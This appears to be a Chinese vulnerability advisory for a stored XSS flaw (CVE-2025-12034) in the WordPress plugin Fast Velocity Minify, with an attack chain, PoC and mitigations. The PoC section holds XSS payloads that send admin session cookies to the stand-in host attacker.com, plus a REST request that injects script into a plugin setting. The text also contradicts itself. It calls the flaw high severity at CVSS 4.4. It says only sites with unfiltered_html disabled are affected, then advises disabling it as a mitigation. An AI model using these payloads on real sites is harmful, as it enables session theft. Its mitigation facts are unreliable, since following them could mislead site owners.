CVE-2025-12034 WordPress Fast Velocity Minify插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12034

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Fast Velocity Minify WordPress插件

漏洞概述

CVE-2025-12034是WordPress平台Fast Velocity Minify插件中的一个高危安全漏洞。该漏洞为存储型跨站脚本攻击（Stored Cross-Site Scripting），存在于插件的管理后台设置功能中。漏洞影响范围为3.5.1及以下所有版本。由于插件在处理用户输入时未进行充分的输入清理（input sanitization）和输出转义（output escaping），导致具有管理员级别权限及以上的认证攻击者可以在WordPress管理后台的设置页面中注入任意Web脚本代码。这些恶意脚本会被永久存储在数据库中，当其他用户访问包含恶意代码的页面时，注入的脚本将自动执行，从而实现窃取会话Cookie、劫持用户操作、植入恶意重定向等攻击目的。值得注意的是，此漏洞仅影响多站点（Multi-site）WordPress安装以及禁用了unfiltered_html功能的单站点安装，因为这些配置下WordPress核心会对HTML标签进行额外限制，而插件的过滤器未能正确处理边界情况。

技术细节

Fast Velocity Minify插件的存储型XSS漏洞源于admin settings功能中缺少适当的输入验证和输出编码。该插件在处理CSS/JS最小化设置参数时，直接将用户提交的数据存储到数据库并在后续页面中输出，未对特殊字符进行HTML实体转义。攻击者以管理员身份登录后，可在插件设置页面的特定输入字段中构造包含JavaScript代码的Payload，如：<img src=x onerror=alert(document.cookie)>。由于输出时未使用esc_html()或类似函数进行转义，浏览器会将注入的代码作为合法HTML/JavaScript执行。攻击成功的前提条件包括：1）攻击者需拥有WordPress站点管理员权限；2）目标站点必须为多站点模式或已禁用unfiltered_html；3）需诱导其他管理员或用户访问注入后的页面。CVSS 4.4评分反映了攻击复杂度较高（需认证且特定环境限制），但机密性和完整性影响分别为低和低。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标WordPress站点是否安装Fast Velocity Minify插件，并通过版本检测确认版本<=3.5.1

STEP 2

2. 权限获取

攻击者获取目标WordPress站点的管理员账户凭据，可通过钓鱼、密码爆破或利用其他漏洞实现

STEP 3

3. 漏洞验证

确认目标站点为多站点模式或已禁用unfiltered_html功能，这可通过查看站点配置或尝试注入HTML标签验证

STEP 4

4. Payload注入

以管理员身份登录后，访问插件设置页面，在CSS/JS排除列表或其他文本输入字段中注入恶意XSS Payload

STEP 5

5. 数据持久化

保存设置后，恶意脚本被存储到WordPress数据库中，在数据库表wp_options或插件专用表中形成持久化攻击点

STEP 6

6. 触发执行

当其他管理员或用户访问任何包含该设置数据的页面时，浏览器解析并执行注入的JavaScript代码

STEP 7

7. 恶意行为

XSS Payload执行后可窃取会话Cookie、修改页面内容、植入钓鱼表单或重定向用户到恶意站点

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12034 PoC: Fast Velocity Minify Stored XSS -->
<!-- Requirements: WordPress admin access, Multi-site or unfiltered_html disabled -->

<!-- Step 1: Navigate to Fast Velocity Minify settings -->
<!-- Settings > Fast Velocity Minify > General Settings -->

<!-- Step 2: Inject XSS payload in any text field (e.g., CSS file exclusion field) -->
<!-- Payload: -->
<img src=x onerror=this.src='https://attacker.com/log?c='+document.cookie>

<!-- Step 3: Save settings -->
<!-- The XSS payload is stored in database -->

<!-- Step 4: When any user visits admin pages, the XSS executes -->
<!-- Cookie data is sent to attacker's server -->

<!-- Example JavaScript PoC for data exfiltration -->
<script>
(function() {
    var cookie = document.cookie;
    var data = 'cookie=' + encodeURIComponent(cookie) + '&url=' + encodeURIComponent(window.location.href);
    new Image().src = 'https://attacker.com/steal?' + data;
})();
</script>

<!-- Automated PoC using WordPress REST API -->
/*
POST /wp-json/wp/v2/settings
Authorization: Cookie [admin cookie]
Content-Type: application/json

{
  "fast_velocity_minify_css_exclude": "</style><script>alert(document.domain)</script>"
}
*/

影响范围

Fast Velocity Minify WordPress插件 <= 3.5.1

防御指南

临时缓解措施

临时缓解措施：1) 如果无法立即升级插件，可暂时禁用Fast Velocity Minify插件并使用其他替代方案；2) 在wp-config.php中添加define('DISALLOW_UNFILTERED_HTML', true);限制HTML输入（注意：这可能影响部分主题和插件功能）；3) 限制管理员账户数量，确保只有可信人员拥有管理员权限；4) 启用双因素认证（2FA）保护管理员账户安全；5) 使用Web应用防火墙（WAF）规则检测和阻止XSS攻击载荷。